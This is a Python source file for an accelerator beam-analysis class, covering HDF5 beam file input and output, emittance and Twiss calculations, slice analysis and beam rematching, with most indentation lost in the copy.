if isinstance(zoffset,(list, np.ndarray)) and len(zoffset) == 3:
xoffset = zoffset[0]
yoffset = zoffset[1]
zoffset = zoffset[2]
else:
xoffset = 0
yoffset = 0
# print('xoffset = ', xoffset)
# print('yoffset = ', yoffset)
# print('zoffset = ', zoffset)
with h5py.File(filename, "w") as f:
inputgrp = f.create_group("Parameters")
            if 'total_charge' not in self.beam or self.beam['total_charge'] == 0:
self.beam['total_charge'] = np.sum(self.beam['charge'])
if sourcefilename is not None:
inputgrp['Source'] = sourcefilename
if pos is not None:
inputgrp['Starting_Position'] = pos
else:
inputgrp['Starting_Position'] = [0, 0, 0]
if rotation is not None:
inputgrp['Rotation'] = rotation
else:
inputgrp['Rotation'] = 0
inputgrp['total_charge'] = self.beam['total_charge']
inputgrp['npart'] = len(self.x)
inputgrp['centered'] = centered
inputgrp['code'] = self.beam['code']
inputgrp['particle_mass'] = mass
beamgrp = f.create_group("beam")
if 'reference_particle' in self.beam:
beamgrp['reference_particle'] = self.beam['reference_particle']
if 'status' in self.beam:
beamgrp['status'] = self.beam['status']
beamgrp['longitudinal_reference'] = longitudinal_reference
if len(self.beam['charge']) == len(self.x):
chargevector = self.beam['charge']
else:
chargevector = np.full(len(self.x), self.charge/len(self.x))
array = np.array([self.x + xoffset, self.y + yoffset, self.z + zoffset, self.cpx, self.cpy, self.cpz, self.t, chargevector]).transpose()
beamgrp['columns'] = np.array(['x','y','z', 'cpx', 'cpy', 'cpz', 't', 'q'], dtype='S')
beamgrp['units'] = np.array(['m','m','m','eV','eV','eV','s','e'], dtype='S')
beamgrp.create_dataset("beam", data=array)
def read_HDF5_beam_file(self, filename, local=False):
self.reset_dicts()
with h5py.File(filename, "r") as h5file:
if h5file.get('beam/reference_particle') is not None:
self.beam['reference_particle'] = np.array(h5file.get('beam/reference_particle'))
            if h5file.get('beam/longitudinal_reference') is not None:
                longref = h5file.get('beam/longitudinal_reference')[()]
                ''' h5py returns stored strings as bytes; decode so later comparisons against 't'/'z' succeed '''
                self.beam['longitudinal_reference'] = longref.decode() if isinstance(longref, bytes) else longref
            else:
                self.beam['longitudinal_reference'] = 't'
if h5file.get('beam/status') is not None:
self.beam['status'] = np.array(h5file.get('beam/status'))
x, y, z, cpx, cpy, cpz, t, charge = np.array(h5file.get('beam/beam')).transpose()
cp = np.sqrt(cpx**2 + cpy**2 + cpz**2)
self.beam['x'] = x
self.beam['y'] = y
self.beam['z'] = z
# self.beam['cpx'] = cpx
# self.beam['cpy'] = cpy
# self.beam['cpz'] = cpz
self.beam['px'] = cpx * self.q_over_c
self.beam['py'] = cpy * self.q_over_c
self.beam['pz'] = cpz * self.q_over_c
# self.beam['cp'] = cp
# self.beam['p'] = cp * self.q_over_c
# self.beam['xp'] = np.arctan(self.px/self.pz)
# self.beam['yp'] = np.arctan(self.py/self.pz)
self.beam['clock'] = np.full(len(self.x), 0)
# self.beam['gamma'] = np.sqrt(1+(self.cp/self.E0_eV)**2)
# velocity_conversion = 1 / (constants.m_e * self.gamma)
# self.beam['vx'] = velocity_conversion * self.px
# self.beam['vy'] = velocity_conversion * self.py
# self.beam['vz'] = velocity_conversion * self.pz
# self.beam['Bx'] = self.vx / constants.speed_of_light
# self.beam['By'] = self.vy / constants.speed_of_light
# self.beam['Bz'] = self.vz / constants.speed_of_light
self.beam['t'] = t
self.beam['charge'] = charge
self.beam['total_charge'] = np.sum(self.beam['charge'])
startposition = np.array(h5file.get('/Parameters/Starting_Position'))
startposition = startposition if startposition is not None else [0,0,0]
self.beam['starting_position'] = startposition
theta = np.array(h5file.get('/Parameters/Rotation'))
theta = theta if theta is not None else 0
self.beam['rotation'] = theta
        if local:
self.rotate_beamXZ(self.beam['rotation'], preOffset=self.beam['starting_position'])
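    ''' Example round-trip (sketch; 'beam.hdf5' is a placeholder filename and `b` an instance of this class):
            b.read_HDF5_beam_file('beam.hdf5')
            b.write_astra_beam_file('beam.astra')
    '''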
''' ******************** Statistical Parameters ************************* '''
def kde_function(self, x, bandwidth=0.2, **kwargs):
"""Kernel Density Estimation with Scipy"""
# Note that scipy weights its bandwidth by the covariance of the
# input data. To make the results comparable to the other methods,
# we divide the bandwidth by the sample standard deviation here.
# Taken from https://jakevdp.github.io/blog/2013/12/01/kernel-density-estimation/
if not hasattr(self, '_kde_x') or not len(x) == len(self._kde_x) or not np.allclose(x, self._kde_x) or not bandwidth == self._kde_bandwidth:
self._kde_x = x
self._kde_bandwidth = bandwidth
self._kde_function = gaussian_kde(x, bw_method=bandwidth / x.std(ddof=1), **kwargs)
return self._kde_function
def PDF(self, x, x_grid, bandwidth=0.2, **kwargs):
kde = self.kde_function(x, bandwidth, **kwargs)
return kde.evaluate(x_grid)
def PDFI(self, x, x_grid, bandwidth=0.2, **kwargs):
kde = self.kde_function(x, bandwidth, **kwargs)
        # note: the charge scaling hinted at by the name was never enabled; this returns the plain PDF
        return kde.evaluate(x_grid)
def CDF(self, x, x_grid, bandwidth=0.2, **kwargs):
kde = self.kde_function(x, bandwidth, **kwargs)
cdf = np.vectorize(lambda e: kde.integrate_box_1d(x_grid[0], e))
return cdf(x_grid)
def FWHM(self, X, Y, frac=0.5):
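        ''' full width of Y(X) at `frac` of its maximum; returns the width and the indices above the threshold '''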
frac = 1.0/frac if frac > 1 else frac
d = Y - (max(Y) * frac)
indexes = np.where(d > 0)[0]
return abs(X[indexes][-1] - X[indexes][0]), indexes
def covariance(self, u, up):
u2 = u - np.mean(u)
up2 = up - np.mean(up)
return np.mean(u2*up2) - np.mean(u2)*np.mean(up2)
def emittance(self, x, xp, p=None):
cov_x = self.covariance(x, x)
cov_xp = self.covariance(xp, xp)
cov_x_xp = self.covariance(x, xp)
emittance = np.sqrt(cov_x * cov_xp - cov_x_xp**2) if (cov_x * cov_xp - cov_x_xp**2) > 0 else 0
if p is None:
return emittance
else:
gamma = np.mean(p)/self.E0_eV
return gamma*emittance
@property
def volume(self):
return self.volume6D(self.x, self.y, self.z-np.mean(self.z), self.cpx/self.cpz, self.cpy/self.cpz, ((self.cpz/np.mean(self.cp)) - 1))
@property
def density(self):
return len(self.x) / self.volume
def volume6D(self, x, y, t, xp, yp, cp):
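        ''' convex-hull volume of the 6D cloud; Qhull's 'QJ' option joggles the input so degenerate (flat) distributions do not raise errors '''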
if len(x) < 10:
return 1e6
else:
beam = list(zip(x, y, t, xp, yp, cp))
return ConvexHull(beam, qhull_options='QJ').volume
def mve_emittance(self, x, xp, p=None):
(center, radii, rotation, hullP) = MVE.getMinVolEllipse(list(zip(x,xp)), .01)
emittance = radii[0] * radii[1]
if p is None:
return emittance
else:
gamma = np.mean(p)/self.E0_eV
return gamma*emittance
@property
def normalized_horizontal_emittance(self):
return self.emittance(self.x, self.xp, self.cp)
@property
def normalized_vertical_emittance(self):
return self.emittance(self.y, self.yp, self.cp)
@property
def horizontal_emittance(self):
return self.emittance(self.x, self.xp)
@property
def vertical_emittance(self):
return self.emittance(self.y, self.yp)
@property
def normalized_mve_horizontal_emittance(self):
return self.mve_emittance(self.x, self.xp, self.cp)
@property
def normalized_mve_vertical_emittance(self):
return self.mve_emittance(self.y, self.yp, self.cp)
@property
def horizontal_mve_emittance(self):
return self.mve_emittance(self.x, self.xp)
@property
def vertical_mve_emittance(self):
return self.mve_emittance(self.y, self.yp)
@property
def horizontal_emittance_90(self):
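        ''' 90% emittance: the per-particle Courant-Snyder action gamma*x^2 + 2*alpha*x*x' + beta*x'^2, taken at the 90th percentile '''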
emit = self.horizontal_emittance
alpha = self.alpha_x
beta = self.beta_x
gamma = self.gamma_x
emiti = gamma * self.x**2 + 2 * alpha * self.x * self.xp + beta * self.xp * self.xp
return sorted(emiti)[int(0.9*len(emiti)-0.5)]
@property
def normalized_horizontal_emittance_90(self):
emit = self.horizontal_emittance_90
return np.mean(self.cp)/self.E0_eV * emit
@property
def vertical_emittance_90(self):
emit = self.vertical_emittance
alpha = self.alpha_y
beta = self.beta_y
gamma = self.gamma_y
emiti = gamma * self.y**2 + 2 * alpha * self.y * self.yp + beta * self.yp * self.yp
return sorted(emiti)[int(0.9*len(emiti)-0.5)]
@property
def normalized_vertical_emittance_90(self):
emit = self.vertical_emittance_90
return np.mean(self.cp)/self.E0_eV * emit
@property
def beta_x(self):
self.twiss['beta_x'] = self.covariance(self.x,self.x) / self.horizontal_emittance
return self.twiss['beta_x']
@property
def alpha_x(self):
self.twiss['alpha_x'] = -1*self.covariance(self.x,self.xp) / self.horizontal_emittance
return self.twiss['alpha_x']
@property
def gamma_x(self):
self.twiss['gamma_x'] = self.covariance(self.xp,self.xp) / self.horizontal_emittance
return self.twiss['gamma_x']
@property
def beta_y(self):
self.twiss['beta_y'] = self.covariance(self.y,self.y) / self.vertical_emittance
return self.twiss['beta_y']
@property
def alpha_y(self):
self.twiss['alpha_y'] = -1*self.covariance(self.y,self.yp) / self.vertical_emittance
return self.twiss['alpha_y']
@property
def gamma_y(self):
self.twiss['gamma_y'] = self.covariance(self.yp,self.yp) / self.vertical_emittance
return self.twiss['gamma_y']
@property
def twiss_analysis(self):
return self.horizontal_emittance, self.alpha_x, self.beta_x, self.gamma_x, self.vertical_emittance, self.alpha_y, self.beta_y, self.gamma_y
def eta_correlation(self, u):
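        ''' linear correlation of u with the momentum; eta_corrected() uses it to subtract the dispersive contribution '''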
return self.covariance(u,self.p) / self.covariance(self.p, self.p)
def eta_corrected(self, u):
return u - self.eta_correlation(u)*self.p
@property
def horizontal_emittance_corrected(self):
xc = self.eta_corrected(self.x)
xpc = self.eta_corrected(self.xp)
return self.emittance(xc, xpc)
@property
def vertical_emittance_corrected(self):
yc = self.eta_corrected(self.y)
ypc = self.eta_corrected(self.yp)
return self.emittance(yc, ypc)
@property
def beta_x_corrected(self):
xc = self.eta_corrected(self.x)
self.twiss['beta_x'] = self.covariance(xc, xc) / self.horizontal_emittance_corrected
return self.twiss['beta_x']
@property
def alpha_x_corrected(self):
xc = self.eta_corrected(self.x)
xpc = self.eta_corrected(self.xp)
self.twiss['alpha_x'] = -1*self.covariance(xc, xpc) / self.horizontal_emittance_corrected
return self.twiss['alpha_x']
@property
def gamma_x_corrected(self):
xpc = self.eta_corrected(self.xp)
self.twiss['gamma_x'] = self.covariance(xpc, xpc) / self.horizontal_emittance_corrected
return self.twiss['gamma_x']
@property
def beta_y_corrected(self):
yc = self.eta_corrected(self.y)
self.twiss['beta_y'] = self.covariance(yc,yc) / self.vertical_emittance_corrected
return self.twiss['beta_y']
@property
def alpha_y_corrected(self):
yc = self.eta_corrected(self.y)
ypc = self.eta_corrected(self.yp)
self.twiss['alpha_y'] = -1*self.covariance(yc, ypc) / self.vertical_emittance_corrected
return self.twiss['alpha_y']
@property
def gamma_y_corrected(self):
ypc = self.eta_corrected(self.yp)
self.twiss['gamma_y'] = self.covariance(ypc,ypc) / self.vertical_emittance_corrected
return self.twiss['gamma_y']
@property
def twiss_analysis_corrected(self):
return self.horizontal_emittance_corrected, self.alpha_x_corrected, self.beta_x_corrected, self.gamma_x_corrected, \
self.vertical_emittance_corrected, self.alpha_y_corrected, self.beta_y_corrected, self.gamma_y_corrected
@property
def slice_length(self):
return self._slicelength
@slice_length.setter
def slice_length(self, slicelength):
self._slicelength = slicelength
@property
def slices(self):
return self._slices
@slices.setter
def slices(self, slices):
twidth = (max(self.t) - min(self.t))
if twidth == 0:
t = self.z / (-1 * self.Bz * constants.speed_of_light)
twidth = (max(t) - min(t))
if slices == 0:
slices = int(twidth / 0.1e-12)
self._slices = slices
self._slicelength = twidth / self._slices
def bin_time(self):
if not hasattr(self,'slice'):
self.slice = {}
if not hasattr(self,'_slicelength'):
self.slice_length = 0
# print("Assuming slice length is 100 fs")
twidth = (max(self.t) - min(self.t))
if twidth == 0:
t = self.z / (-1 * self.Bz * constants.speed_of_light)
twidth = (max(t) - min(t))
else:
t = self.t
if not self.slice_length > 0.0:
self.slice_length = twidth / 20.0
nbins = max([1,int(np.ceil(twidth / self.slice_length))])+2
self._hist, binst = np.histogram(t, bins=nbins, range=(min(t)-self.slice_length, max(t)+self.slice_length))
self.slice['t_Bins'] = binst
self._t_binned = np.digitize(t, self.slice['t_Bins'])
self._tfbins = [[self._t_binned == i] for i in range(1, len(binst))]
self._tbins = [np.array(self.t)[tuple(tbin)] for tbin in self._tfbins]
self._cpbins = [np.array(self.cp)[tuple(tbin)] for tbin in self._tfbins]
def bin_momentum(self, width=10**6):
if not hasattr(self,'slice'):
self.slice = {}
pwidth = (max(self.cp) - min(self.cp))
if width is None:
self.slice_length_cp = pwidth / self.slices
else:
self.slice_length_cp = width
nbins = max([1,int(np.ceil(pwidth / self.slice_length_cp))])+2
self._hist, binst = np.histogram(self.cp, bins=nbins, range=(min(self.cp)-self.slice_length_cp, max(self.cp)+self.slice_length_cp))
self.slice['cp_Bins'] = binst
self._cp_binned = np.digitize(self.cp, self.slice['cp_Bins'])
self._tfbins = [np.array([self._cp_binned == i]) for i in range(1, len(binst))]
self._cpbins = [self.cp[tuple(cpbin)] for cpbin in self._tfbins]
self._tbins = [self.t[tuple(cpbin)] for cpbin in self._tfbins]
@property
def slice_bins(self):
if not hasattr(self,'slice'):
self.bin_time()
bins = self.slice['t_Bins']
return (bins[:-1] + bins[1:]) / 2
# return [t.mean() for t in ]
@property
def slice_cpbins(self):
if not hasattr(self,'slice'):
self.bin_momentum()
bins = self.slice['cp_Bins']
return (bins[:-1] + bins[1:]) / 2
# return [t.mean() for t in ]
@property
def slice_momentum(self):
if not hasattr(self,'_tbins') or not hasattr(self,'_cpbins'):
self.bin_time()
self.slice['Momentum'] = np.array([cpbin.mean() if len(cpbin) > 0 else 0 for cpbin in self._cpbins ])
return self.slice['Momentum']
@property
def slice_momentum_spread(self):
if not hasattr(self,'_tbins') or not hasattr(self,'_cpbins'):
self.bin_time()
self.slice['Momentum_Spread'] = np.array([cpbin.std() if len(cpbin) > 0 else 0 for cpbin in self._cpbins])
return self.slice['Momentum_Spread']
@property
def slice_relative_momentum_spread(self):
if not hasattr(self,'_tbins') or not hasattr(self,'_cpbins'):
self.bin_time()
self.slice['Relative_Momentum_Spread'] = np.array([100*cpbin.std()/cpbin.mean() if len(cpbin) > 0 else 0 for cpbin in self._cpbins])
return self.slice['Relative_Momentum_Spread']
def slice_data(self, data):
return [data[tuple(tbin)] for tbin in self._tfbins]
def emitbins(self, x, y):
xbins = self.slice_data(x)
ybins = self.slice_data(y)
return list(zip(*[xbins, ybins, self._cpbins]))
@property
def slice_6D_Volume(self):
if not hasattr(self,'_tbins') or not hasattr(self,'_cpbins'):
self.bin_time()
xbins = self.slice_data(self.x)
ybins = self.slice_data(self.y)
zbins = self.slice_data(self.z-np.mean(self.z))
pxbins = self.slice_data(self.cpx/self.cpz)
pybins = self.slice_data(self.cpy/self.cpz)
pzbins = self.slice_data(((self.cpz/np.mean(self.cp)) - 1))
emitbins = list(zip(xbins, ybins, zbins, pxbins, pybins, pzbins))
self.slice['6D_Volume'] = np.array([self.volume6D(*a) for a in emitbins])
return self.slice['6D_Volume']
@property
def slice_density(self):
if not hasattr(self,'_tbins') or not hasattr(self,'_cpbins'):
self.bin_time()
xbins = self.slice_data(self.x)
volume = self.slice_6D_Volume
self.slice['Density'] = np.array([len(x)/v for x, v in zip(xbins, volume)])
return self.slice['Density']
@property
def slice_horizontal_emittance(self):
if not hasattr(self,'_tbins') or not hasattr(self,'_cpbins'):
self.bin_time()
emitbins = self.emitbins(self.x, self.xp)
self.slice['Horizontal_Emittance'] = np.array([self.emittance(xbin, xpbin) if len(cpbin) > 0 else 0 for xbin, xpbin, cpbin in emitbins])
return self.slice['Horizontal_Emittance']
@property
def slice_vertical_emittance(self):
if not hasattr(self,'_tbins') or not hasattr(self,'_cpbins'):
self.bin_time()
emitbins = self.emitbins(self.y, self.yp)
self.slice['Vertical_Emittance'] = np.array([self.emittance(ybin, ypbin) if len(cpbin) > 0 else 0 for ybin, ypbin, cpbin in emitbins])
return self.slice['Vertical_Emittance']
@property
def slice_normalized_horizontal_emittance(self):
if not hasattr(self,'_tbins') or not hasattr(self,'_cpbins'):
self.bin_time()
emitbins = self.emitbins(self.x, self.xp)
self.slice['Normalized_Horizontal_Emittance'] = np.array([self.emittance(xbin, xpbin, cpbin) if len(cpbin) > 0 else 0 for xbin, xpbin, cpbin in emitbins])
return self.slice['Normalized_Horizontal_Emittance']
@property
def slice_normalized_vertical_emittance(self):
if not hasattr(self,'_tbins') or not hasattr(self,'_cpbins'):
self.bin_time()
emitbins = self.emitbins(self.y, self.yp)
self.slice['Normalized_Vertical_Emittance'] = np.array([self.emittance(ybin, ypbin, cpbin) if len(cpbin) > 0 else 0 for ybin, ypbin, cpbin in emitbins])
return self.slice['Normalized_Vertical_Emittance']
@property
def slice_normalized_mve_horizontal_emittance(self):
if not hasattr(self,'_tbins') or not hasattr(self,'_cpbins'):
self.bin_time()
emitbins = self.emitbins(self.x, self.xp)
self.slice['Normalized_mve_Horizontal_Emittance'] = np.array([self.mve_emittance(xbin, xpbin, cpbin) if len(cpbin) > 0 else 0 for xbin, xpbin, cpbin in emitbins])
return self.slice['Normalized_mve_Horizontal_Emittance']
@property
def slice_normalized_mve_vertical_emittance(self):
if not hasattr(self,'_tbins') or not hasattr(self,'_cpbins'):
self.bin_time()
emitbins = self.emitbins(self.y, self.yp)
self.slice['Normalized_mve_Vertical_Emittance'] = np.array([self.mve_emittance(ybin, ypbin, cpbin) if len(cpbin) > 0 else 0 for ybin, ypbin, cpbin in emitbins])
return self.slice['Normalized_mve_Vertical_Emittance']
@property
def slice_peak_current(self):
if not hasattr(self,'_hist'):
self.bin_time()
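        ''' slice current I = (charge per macroparticle) * N_slice / dt_slice '''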
f = lambda bin: self.charge / len(self.t) * (len(bin) / (max(bin) - min(bin))) if len(bin) > 1 else 0
# f = lambda bin: len(bin) if len(bin) > 1 else 0
self.slice['Peak_Current'] = np.array([f(bin) for bin in self._tbins])
return abs(self.slice['Peak_Current'])
@property
def slice_max_peak_current_slice(self):
peakI = self.slice_peak_current
self.slice['Max_Peak_Current_Slice'] = list(abs(peakI)).index(max(abs(peakI)))
return self.slice['Max_Peak_Current_Slice']
@property
def slice_beta_x(self):
xbins = self.slice_data(self.beam['x'])
exbins = self.slice_horizontal_emittance
emitbins = list(zip(xbins, exbins))
self.slice['slice_beta_x'] = np.array([self.covariance(x, x)/ex if ex > 0 else 0 for x, ex in emitbins])
return self.slice['slice_beta_x']
@property
def slice_alpha_x(self):
xbins = self.slice_data(self.x)
xpbins = self.slice_data(self.xp)
exbins = self.slice_horizontal_emittance
emitbins = list(zip(xbins, xpbins, exbins))
self.slice['slice_alpha_x'] = np.array([-1*self.covariance(x, xp)/ex if ex > 0 else 0 for x, xp, ex in emitbins])
return self.slice['slice_alpha_x']
@property
def slice_gamma_x(self):
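        ''' note: this currently returns the projected (whole-bunch) gamma_x rather than a per-slice value '''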
self.twiss['gamma_x'] = self.covariance(self.xp,self.xp) / self.horizontal_emittance
return self.twiss['gamma_x']
@property
def slice_beta_y(self):
ybins = self.slice_data(self.beam['y'])
eybins = self.slice_vertical_emittance
emitbins = list(zip(ybins, eybins))
self.slice['slice_beta_y'] = np.array([self.covariance(y, y)/ey if ey > 0 else 0 for y, ey in emitbins])
return self.slice['slice_beta_y']
@property
def slice_alpha_y(self):
ybins = self.slice_data(self.y)
ypbins = self.slice_data(self.yp)
eybins = self.slice_vertical_emittance
emitbins = list(zip(ybins, ypbins, eybins))
self.slice['slice_alpha_y'] = np.array([-1*self.covariance(y,yp)/ey if ey > 0 else 0 for y, yp, ey in emitbins])
        return self.slice['slice_alpha_y']  # the values were stored in self.slice above, not self.twiss
@property
def slice_gamma_y(self):
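        ''' note: this currently returns the projected (whole-bunch) gamma_y rather than a per-slice value '''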
self.twiss['gamma_y'] = self.covariance(self.yp,self.yp) / self.vertical_emittance
return self.twiss['gamma_y']
def sliceAnalysis(self, density=False):
self.slice = {}
self.bin_time()
peakIPosition = self.slice_max_peak_current_slice
        slice_density = self.slice_density[peakIPosition] if density else 0
        ''' the 6D-hull density is expensive, so honour the density flag instead of always recomputing it '''
        return self.slice_peak_current[peakIPosition], \
               np.std(self.slice_peak_current), \
               self.slice_relative_momentum_spread[peakIPosition], \
               self.slice_normalized_horizontal_emittance[peakIPosition], \
               self.slice_normalized_vertical_emittance[peakIPosition], \
               self.slice_momentum[peakIPosition], \
               slice_density
def mvesliceAnalysis(self):
self.slice = {}
self.bin_time()
peakIPosition = self.slice_max_peak_current_slice
return self.slice_peak_current[peakIPosition], \
np.std(self.slice_peak_current), \
self.slice_relative_momentum_spread[peakIPosition], \
self.slice_normalized_mve_horizontal_emittance[peakIPosition], \
self.slice_normalized_mve_vertical_emittance[peakIPosition], \
self.slice_momentum[peakIPosition], \
self.slice_density[peakIPosition],
@property
def chirp(self):
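        ''' longitudinal chirp: slope of the slice momentum across slices within 75% of the peak current, with the 1e-18 factor converting eV/s to MeV/ps '''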
self.bin_time()
slice_current_centroid_indices = []
slice_momentum_centroid = []
peakIPosition = self.slice_max_peak_current_slice
peakI = self.slice_peak_current[peakIPosition]
slicemomentum = self.slice_momentum
for index, slice_current in enumerate(self.slice_peak_current):
if abs(peakI - slice_current) < (peakI * 0.75):
slice_current_centroid_indices.append(index)
for index in slice_current_centroid_indices:
slice_momentum_centroid.append(slicemomentum[index])
chirp = (1e-18 * (slice_momentum_centroid[-1] - slice_momentum_centroid[0]) / (len(slice_momentum_centroid) * self.slice_length))
return chirp
@property
def x(self):
return self.beam['x']
@property
def y(self):
return self.beam['y']
@property
def z(self):
return self.beam['z']
@property
def zn(self):
return self.beam['z']-np.mean(self.beam['z'])
@property
def px(self):
return self.beam['px']
@property
def py(self):
return self.beam['py']
@property
def pz(self):
return self.beam['pz']
@property
def cpx(self):
return self.beam['px'] / self.q_over_c
@property
def cpy(self):
return self.beam['py'] / self.q_over_c
@property
def cpz(self):
return self.beam['pz'] / self.q_over_c
@property
def xp(self):
return np.arctan(self.px/self.pz)
@property
def yp(self):
return np.arctan(self.py/self.pz)
@property
def t(self):
return self.beam['t']
@property
def p(self):
return self.cp * self.q_over_c
@property
def cp(self):
return np.sqrt(self.cpx**2 + self.cpy**2 + self.cpz**2)
@property
def Brho(self):
return np.mean(self.p) / constants.elementary_charge
@property
def gamma(self):
return np.sqrt(1+(self.cp/self.E0_eV)**2)
@property
def BetaGamma(self):
return self.cp/self.E0_eV
@property
def vx(self):
velocity_conversion = 1 / (constants.m_e * self.gamma)
return velocity_conversion * self.px
@property
def vy(self):
velocity_conversion = 1 / (constants.m_e * self.gamma)
return velocity_conversion * self.py
@property
def vz(self):
velocity_conversion = 1 / (constants.m_e * self.gamma)
return velocity_conversion * self.pz
@property
def Bx(self):
return self.vx / constants.speed_of_light
@property
def By(self):
return self.vy / constants.speed_of_light
@property
def Bz(self):
return self.vz / constants.speed_of_light
@property
def charge(self):
return self.beam['total_charge']
@property
def sigma_z(self):
return self.rms(self.Bz*constants.speed_of_light*(self.beam['t'] - np.mean(self.beam['t'])))
@property
def momentum_spread(self):
return self.cp.std()/np.mean(self.cp)
@property
def linear_chirp_z(self):
return -1*self.rms(self.Bz*constants.speed_of_light*self.t)/self.momentum_spread/100
def computeCorrelations(self, x, y):
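        ''' plain second-moment accumulation: returns <dx*dx>, <dx*dy>, <dy*dy> (population covariances, no Bessel correction) '''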
xAve = np.mean(x)
yAve = np.mean(y)
C11 = 0
C12 = 0
C22 = 0
for i, ii in enumerate(x):
dx = x[i] - xAve
dy = y[i] - yAve
C11 += dx*dx
C12 += dx*dy
C22 += dy*dy
C11 /= len(x)
C12 /= len(x)
C22 /= len(x)
return C11, C12, C22
@property
def eta_x(self):
return self.calculate_etax()[0]
@property
def eta_xp(self):
return self.calculate_etax()[1]
def calculate_etax(self):
p = self.cp
pAve = np.mean(p)
p = [a / pAve - 1 for a in p]
S11, S16, S66 = self.computeCorrelations(self.x, self.cp)
eta1 = -pAve * S16/S66 if S66 else 0
S22, S26, S66 = self.computeCorrelations(self.xp, self.cp)
etap1 = -pAve * S26/S66 if S66 else 0
return eta1, etap1, np.mean(self.t)
def performTransformation(self, x, xp, beta=False, alpha=False, nEmit=False):
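        ''' remove the linear dispersion, measure the Twiss parameters, then apply the 2x2 matching matrix
            R = [[sqrt(b2/b1), 0], [(a1-a2)/sqrt(b1*b2), sqrt(b1/b2)]]; optionally rescale to a requested normalised emittance '''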
p = self.cp
pAve = np.mean(p)
p = [a / pAve - 1 for a in p]
        ''' correlate against the relative deviation delta = cp/pAve - 1 so that eta1 is in metres
            and the subtraction x -= delta*eta1 below is dimensionally consistent '''
        S11, S16, S66 = self.computeCorrelations(self.x, p)
        eta1 = S16/S66 if S66 else 0
        S22, S26, S66 = self.computeCorrelations(self.xp, p)
        etap1 = S26/S66 if S66 else 0
for i, ii in enumerate(x):
x[i] -= p[i] * eta1
xp[i] -= p[i] * etap1
S11, S12, S22 = self.computeCorrelations(x, xp)
emit = np.sqrt(S11*S22 - S12**2)
beta1 = S11/emit
alpha1 = -S12/emit
beta2 = beta if beta is not False else beta1
alpha2 = alpha if alpha is not False else alpha1
R11 = beta2/np.sqrt(beta1*beta2)
R12 = 0
R21 = (alpha1-alpha2)/np.sqrt(beta1*beta2)
R22 = beta1/np.sqrt(beta1*beta2)
        if nEmit is not False:
            ''' nEmit is taken to be the normalised emittance, so convert with gamma ~ pAve/E0_eV (assumes pAve in eV) '''
            factor = np.sqrt(nEmit / (emit * pAve / self.E0_eV))
R11 *= factor
R12 *= factor
R22 *= factor
R21 *= factor
for i, ii in enumerate(x):
x0 = x[i]
xp0 = xp[i]
x[i] = R11 * x0 + R12 * xp0
xp[i] = R21*x0 + R22*xp0
return x, xp
def rematchXPlane(self, beta=False, alpha=False, nEmit=False):
x, xp = self.performTransformation(self.x, self.xp, beta, alpha, nEmit)
self.beam['x'] = x
self.beam['xp'] = xp
cpz = self.cp / np.sqrt(self.beam['xp']**2 + self.yp**2 + 1)
cpx = self.beam['xp'] * cpz
cpy = self.yp * cpz
self.beam['px'] = cpx * self.q_over_c
self.beam['py'] = cpy * self.q_over_c
self.beam['pz'] = cpz * self.q_over_c
def rematchYPlane(self, beta=False, alpha=False, nEmit=False):
y, yp = self.performTransformation(self.y, self.yp, beta, alpha, nEmit)
self.beam['y'] = y
self.beam['yp'] = yp
cpz = self.cp / np.sqrt(self.xp**2 + self.beam['yp']**2 + 1)
cpx = self.xp * cpz
cpy = self.beam['yp'] * cpz
self.beam['px'] = cpx * self.q_over_c
self.beam['py'] = cpy * self.q_over_c
self.beam['pz'] = cpz * self.q_over_c
def performTransformationPeakISlice(self, xslice, xpslice, x, xp, beta=False, alpha=False, nEmit=False):
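        ''' as performTransformation, but the Twiss parameters are measured on the supplied peak-current slice while the whole bunch is transformed '''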
p = self.cp
pAve = np.mean(p)
p = [a / pAve - 1 for a in p]
        ''' as above: correlate against the relative deviation delta = cp/pAve - 1 '''
        S11, S16, S66 = self.computeCorrelations(self.x, p)
        eta1 = S16/S66 if S66 else 0
        S22, S26, S66 = self.computeCorrelations(self.xp, p)
        etap1 = S26/S66 if S66 else 0
for i, ii in enumerate(x):
x[i] -= p[i] * eta1
xp[i] -= p[i] * etap1
S11, S12, S22 = self.computeCorrelations(xslice, xpslice)
emit = np.sqrt(S11*S22 - S12**2)
beta1 = S11/emit
alpha1 = -S12/emit
beta2 = beta if beta is not False else beta1
alpha2 = alpha if alpha is not False else alpha1
R11 = beta2/np.sqrt(beta1*beta2)
R12 = 0
R21 = (alpha1-alpha2)/np.sqrt(beta1*beta2)
R22 = beta1/np.sqrt(beta1*beta2)
        if nEmit is not False:
            ''' convert the requested normalised emittance with gamma ~ pAve/E0_eV (assumes pAve in eV) '''
            factor = np.sqrt(nEmit / (emit * pAve / self.E0_eV))
R11 *= factor
R12 *= factor
R22 *= factor
R21 *= factor
for i, ii in enumerate(x):
x0 = x[i]
xp0 = xp[i]
x[i] = R11 * x0 + R12 * xp0
xp[i] = R21*x0 + R22*xp0
return x, xp
def rematchXPlanePeakISlice(self, beta=False, alpha=False, nEmit=False):
peakIPosition = self.slice_max_peak_current_slice
xslice = self.slice_data(self.x)[peakIPosition]
xpslice = self.slice_data(self.xp)[peakIPosition]
x, xp = self.performTransformationPeakISlice(xslice, xpslice, self.x, self.xp, beta, alpha, nEmit)
self.beam['x'] = x
self.beam['xp'] = xp
cpz = self.cp / np.sqrt(self.beam['xp']**2 + self.yp**2 + 1)
cpx = self.beam['xp'] * cpz
cpy = self.yp * cpz
self.beam['px'] = cpx * self.q_over_c
self.beam['py'] = cpy * self.q_over_c
self.beam['pz'] = cpz * self.q_over_c
def rematchYPlanePeakISlice(self, beta=False, alpha=False, nEmit=False):
peakIPosition = self.slice_max_peak_current_slice
yslice = self.slice_data(self.y)[peakIPosition]
ypslice = self.slice_data(self.yp)[peakIPosition]
y, yp = self.performTransformationPeakISlice(yslice, ypslice, self.y, self.yp, beta, alpha, nEmit)
self.beam['y'] = y
self.beam['yp'] = yp
cpz = self.cp / np.sqrt(self.xp**2 + self.beam['yp']**2 + 1)
cpx = self.xp * cpz
cpy = self.beam['yp'] * cpz
self.beam['px'] = cpx * self.q_over_c
self.beam['py'] = cpy * self.q_over_c
self.beam['pz'] = cpz * self.q_over_c
@property
def Sx(self):
return np.sqrt(self.covariance(self.x,self.x))
@property
def Sy(self):
return np.sqrt(self.covariance(self.y,self.y))
| [
"[email protected]"
] | |
